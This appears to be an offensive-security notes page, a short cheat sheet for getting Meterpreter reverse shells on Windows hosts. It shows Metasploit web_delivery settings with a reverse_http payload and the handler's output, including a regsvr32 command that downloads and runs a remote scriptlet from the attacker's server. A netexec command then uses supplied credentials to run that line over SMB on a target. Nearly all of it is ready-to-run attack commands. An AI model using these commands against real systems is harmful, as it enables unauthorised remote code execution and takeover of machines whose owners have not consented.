Web delivery Shells with msf / nxc

1.0 Configurations

1.1 Metasploit

msf> use exploit/multi/script/web_delivery
msf> set payload windows/x64/meterpreter/reverse_http
msf> set srvhost $localip
msf> set srvport 8080
msf> set lhost $localip
msf> set lport 6699
msf> set target 3
msf> run
...
[*] Started HTTP reverse handler on http://$localip:6699
[*] Using URL: http://$localip:8080/2U0AjtJhBHgx
[*] Server started.
[*] Run the following command on the target machine:
regsvr32 /s /n /u /i:http://$localip:8080/2U0AjtJhBHgx.sct scrobj.dll

2.0 Exploitation

2.1 netexec

nxc smb -u $user -p $pass -x "regsvr32 /s /n /u /i:http://$localip:8080/2U0AjtJhBHgx.sct scrobj.dll"

References

Link

hckhsn

Explorer

Web delivery Shells

Web delivery Shells with msf / nxc

1.0 Configurations

1.1 Metasploit

2.0 Exploitation

2.1 netexec

References

Graphansicht

Inhaltsverzeichnis